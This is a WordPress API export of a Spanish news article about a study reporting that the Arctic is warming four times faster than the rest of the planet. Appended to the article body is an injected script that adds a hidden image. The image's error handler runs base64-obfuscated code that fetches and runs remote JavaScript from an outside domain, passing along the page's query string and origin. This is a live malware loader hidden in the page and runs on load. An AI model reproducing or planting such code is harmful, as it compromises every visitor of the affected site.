{"id":5673,"date":"2022-08-17T11:37:42","date_gmt":"2022-08-17T14:37:42","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5673"},"modified":"2025-08-13T16:14:43","modified_gmt":"2025-08-13T19:14:43","slug":"el-artico-se-calienta-cuatro-veces-mas-rapido-que-el-resto-del-planeta","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5673","title":{"rendered":"El \u00c1rtico se calienta cuatro veces m\u00e1s r\u00e1pido que el resto del planeta"},"content":{"rendered":"\n<h5 class=\"has-text-color wp-block-heading\" style=\"color:#7a5a02\">Antti Lipponen, coautor de un estudio difundido en el portal cient\u00edfico Communications Earth &amp; Environment y miembro del Instituto Meteorol\u00f3gico Finland\u00e9s, alert\u00f3 que \u00aba medida que el \u00c1rtico se calienta, sus glaciares ir\u00e1n derriti\u00e9ndose y eso afectar\u00e1 los niveles del mar globalmente\u00bb.<\/h5>\n\n\n\n<p>El C\u00edrculo Polar \u00c1rtico se calent\u00f3 a un ritmo cuatro veces m\u00e1s r\u00e1pido que el resto del planeta en los \u00faltimos 40 a\u00f1os debido al cambio clim\u00e1tico, seg\u00fan un informe publicado este jueves, que advirti\u00f3 que el fen\u00f3meno es m\u00e1s profundo de lo que los \u00faltimos estudios indicaban.<\/p>\n\n\n\n<p>As\u00ed fue determinado por un equipo de expertos en Noruega y Finlandia que analiz\u00f3 los datos de temperatura recogidos v\u00eda sat\u00e9lite desde 1979 sobre la regi\u00f3n \u00e1rtica, con lo que<strong>&nbsp;registraron un calentamiento de 0,75\u00baC como media cada d\u00e9cada, cuatro veces m\u00e1s que el resto del planeta<\/strong>, explicaron los cient\u00edficos en el estudio difundido en el portal cient\u00edfico Communications Earth &amp; Environment.<\/p>\n\n\n\n<p>\u00abHasta ahora la creencia era que el \u00c1rtico se calentaba dos veces aproximadamente m\u00e1s r\u00e1pido que el resto del planeta, as\u00ed que me qued\u00e9 un poco sorprendido cuando nuestra cifra apareci\u00f3 mucho m\u00e1s alta\u00bb, explic\u00f3 a la agencia AFP&nbsp;<strong>Antti Lipponen, coautor del estudio y miembro del Instituto Meteorol\u00f3gico Finland\u00e9s<\/strong>.<\/p>\n\n\n\n<p>En su \u00faltimo informe de 2019, el grupo de expertos del clima de la Organizaci\u00f3n de Naciones Unidas (ONU) hab\u00edan calculado que el porcentaje superior de calentamiento, conocido como \u00abamplificaci\u00f3n \u00e1rtica\u00bb, era entre dos y tres veces mayor que en el resto del planeta.<\/p>\n\n\n\n<p>Asimismo, los investigadores registraron \u00abvariaciones regionales significativas\u00bb dentro del C\u00edrculo Polar \u00c1rtico y sectores como el euroasi\u00e1tico del Oc\u00e9ano \u00c1rtico, cerca de los archipi\u00e9lagos Svalbard (Noruega) y Nueva Zembla (Rusia), que se calent\u00f3 hasta 1,25\u00ba C por d\u00e9cada, es decir siete veces m\u00e1s que el resto del mundo.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>\u00abAlgo est\u00e1 sucediendo en el \u00c1rtico y nos afectar\u00e1 a todos\u00bb<\/p><cite>Antti Lipponen<\/cite><\/blockquote>\n\n\n\n<p>\u00abEl cambio clim\u00e1tico es causado por los humanos.&nbsp;<strong>A medida que el \u00c1rtico se calienta, sus glaciares ir\u00e1n derriti\u00e9ndose y eso afectar\u00e1 los niveles del mar globalmente<\/strong>\u00ab, sostuvo Lipponen y asever\u00f3: \u00abAlgo est\u00e1 sucediendo en el \u00c1rtico y nos afectar\u00e1 a todos\u00bb.<\/p>\n\n\n\n<p>El calentamiento de la regi\u00f3n \u00e1rtica, aseguraron, tiene un impacto profundo en las comunidades locales y en la fauna salvaje, como los osos polares.<\/p>\n\n\n\n<p>Con este calentamiento acelerado, provocado por el cambio clim\u00e1tico, los hielos de la regi\u00f3n \u00e1rtica est\u00e1n absorbiendo el calor en lugar de rebotarlo, como deber\u00edan hacerlo, y ese exceso de agua procedente de las regiones continentales e insulares del c\u00edrculo polar se dirige a la masa oce\u00e1nica.<\/p>\n\n\n\n<p>El&nbsp;<strong>deshielo en Groenlandia se est\u00e1 acercando as\u00ed \u00aba un punto de no retorno\u00bb<\/strong>, seg\u00fan algunos estudios, y esa masa helada contiene suficiente agua para hacer subir el nivel del mar \u00abhasta seis metros en todo el planeta\u00bb, consign\u00f3 la AFP.<\/p>\n\n\n\n<p>Seg\u00fan el Panel Intergubernamental del Cambio Clim\u00e1tico (IPCC, por sus siglas en ingl\u00e9s), el&nbsp;<strong>nivel del mar ha aumentado 20 cent\u00edmetros desde 1900 y el fen\u00f3meno se est\u00e1 acelerando desde la d\u00e9cada de los 1990<\/strong>, en un contexto en que el cambio clim\u00e1tico ya provoc\u00f3 un aumento de la temperatura media del planeta de 1,1\u00ba C respecto a la era preindustrial.<\/p>\n\n\n\n<p>Seg\u00fan la Organizaci\u00f3n Meteorol\u00f3gica Mundial, la subida de temperaturas va camino de ser de entre 2,5 y 3 grados.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Antti Lipponen, coautor de un estudio difundido en el portal cient\u00edfico Communications Earth &amp; Environment y miembro del Instituto Meteorol\u00f3gico Finland\u00e9s, alert\u00f3 que \u00aba medida que el \u00c1rtico se calienta, sus glaciares ir\u00e1n derriti\u00e9ndose y eso afectar\u00e1 los niveles del mar globalmente\u00bb. El C\u00edrculo Polar \u00c1rtico se calent\u00f3 a un ritmo cuatro veces m\u00e1s r\u00e1pido [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5674,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-5673","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5673","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5673"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5673\/revisions"}],"predecessor-version":[{"id":10603,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5673\/revisions\/10603"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5674"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5673"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5673"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5673"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}